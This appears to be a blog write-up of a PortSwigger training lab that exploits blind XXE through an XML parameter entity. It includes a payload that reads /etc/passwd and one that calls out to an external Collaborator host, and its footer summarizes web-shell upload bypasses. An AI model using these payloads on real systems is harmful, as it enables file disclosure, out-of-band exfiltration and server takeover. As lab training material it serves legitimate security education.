On this page
apsyleg1 min read
#portswigger #xxe #web-security
Blind XXE with OOB Interaction via XML Parameter Entities
Lab
Blind XXE with out-of-band interaction via XML parameter entities · Practitioner
Solution
Given
This lab has a "Check stock" feature that parses XML input, but does not display any unexpected values, and blocks requests containing regular external entities.
To solve the lab, use a parameter entity to make the XML parser issue a DNS lookup and HTTP request to Burp Collaborator.
Analyzing the task
We need to use a parameter entity to make the XML parser send a request to our Burp Collaborator server.
Recon
We find the route. In the body:
<?xml version="1.0" encoding="UTF-8"?>
<stockCheck><productId>5</productId><storeId>1</storeId></stockCheck>
Out of curiosity, let's first try inserting a general external entity:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE stockCheck [<!ENTITY test SYSTEM 'file:///etc/passwd'>]>
<stockCheck><productId>5&test;</productId><storeId>1</storeId></stockCheck>
"Entities are not allowed for security reasons"
Exploitation
Doesn't go through — so we do it via a parameter entity:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE stockCheck [<!ENTITY % xxe SYSTEM "https://ne5p4zgdtmsrz8u7ig29c80bq2w0ku8j.oastify.com"> %xxe; ]>
<stockCheck><productId>5</productId><storeId>1</storeId></stockCheck>
Lab solved!
More in this category
Web Shell Upload via Extension Blacklist Bypass (PortSwigger Lab)
.php is blacklisted, but .htaccess uploads without complaint — we slip our own Apache config in and make the server execute shell.bug as PHP.
Web Shell Upload via Obfuscated File Extension (PortSwigger Lab)
Extension blacklist rejects .php and a double-extension shell.php.jpg is served as an image — a null byte in shell.php%00.jpg bypasses both checks.
Remote Code Execution via Web Shell Upload (PortSwigger Lab)
Avatar upload has no validation — drop a PHP web shell and read /home/carlos/secret.